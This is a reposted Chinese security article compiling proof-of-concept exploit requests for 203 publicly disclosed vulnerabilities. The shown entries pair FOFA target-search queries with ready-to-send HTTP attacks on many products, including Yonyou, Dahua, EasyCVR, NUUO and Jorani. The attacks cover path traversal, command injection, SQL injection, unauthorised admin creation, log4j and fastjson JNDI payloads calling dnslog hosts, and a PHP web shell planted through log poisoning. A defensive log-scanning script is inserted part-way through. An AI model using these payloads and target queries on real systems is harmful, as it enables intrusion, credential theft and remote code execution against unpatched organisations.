Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world offensive activity, and this article is meant to help defenders. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Security patches: every vulnerability listed is already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that were too long have been replaced with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have it removed.

Notice

To keep things simple and easy to browse, there is no "reply to receive the full list" step. This article is the most complete version available; when using it, press F12 and search for keywords.
Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-Premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg configuration information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained from the login in step one
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double-URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

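As an added defensive example (not part of the original compilation), the following Python scans web access-log lines for the probe patterns seen in entries 2, 5 and 9 above, URL-decoding repeatedly so that the double-encoded Doccms payload is caught rather than slipping past a single-pass decoder; the log lines and IP addresses are constructed, and the signature set is a starting point, not a complete ruleset.

```python
"""Defensive check: normalise request targets from a web access log and flag
the probe patterns catalogued in this list (path traversal, shell-metacharacter
command injection, error-based SQL injection), including the double-URL-encoded
variant used against the Doccms keyword parameter. Added example; the log lines
below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Indicator patterns, matched against the fully decoded request target.
SIGNATURES = {
    "path_traversal": re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)"),
    "cmd_injection": re.compile(r"[;|`]\s*(?:whoami|id|cat|sh|bash)\b", re.I),
    "sqli_error_based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
}

MAX_DECODE_ROUNDS = 5  # bound the loop so a pathological input cannot spin

# Apache/Nginx common log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode_fully(target: str) -> tuple[str, int]:
    """URL-decode until the string stops changing.

    Returns (decoded, rounds). rounds is the number of encoding layers
    removed: 0 or 1 is normal browser traffic, 2 or more means the sender
    stacked encodings, which is how the Doccms payload above evades a
    decoder that only decodes once."""
    rounds = 0
    current = target
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def classify_target(target: str) -> dict:
    """Decode one request target and list every signature it trips."""
    decoded, rounds = decode_fully(target)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if rounds >= 2:
        hits.append("multi_layer_encoding")
    return {"decoded": decoded, "encoding_rounds": rounds, "hits": hits}


def scan_log(lines):
    """Return one finding per log line whose decoded target trips a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        result = classify_target(m["target"])
        if result["hits"]:
            findings.append({"ip": m["ip"], "method": m["method"],
                             "status": m["status"], **result})
    return findings


# Constructed sample log: three probes taken from entries 2, 5 and 9 above,
# followed by two benign requests that must not be flagged.
DOCCMS_TARGET = (
    "/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34"
    "%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33"
    "%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31"
    "%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38"
    "%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35"
    "%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35"
    "%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37"
    "%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"
)
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Oct/2023:09:34:28 +0000] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1450',
    '203.0.113.7 - - [24/Oct/2023:09:34:29 +0000] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 38',
    '203.0.113.7 - - [24/Oct/2023:09:34:30 +0000] "GET ' + DOCCMS_TARGET + ' HTTP/1.1" 500 0',
    '198.51.100.2 - - [24/Oct/2023:09:35:01 +0000] "GET /search/index.php?keyword=printer%20ink HTTP/1.1" 200 5120',
    '198.51.100.2 - - [24/Oct/2023:09:35:02 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["method"], f["encoding_rounds"], f["hits"], f["decoded"][:70])
```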
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected code executes a function whose argument is supplied base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

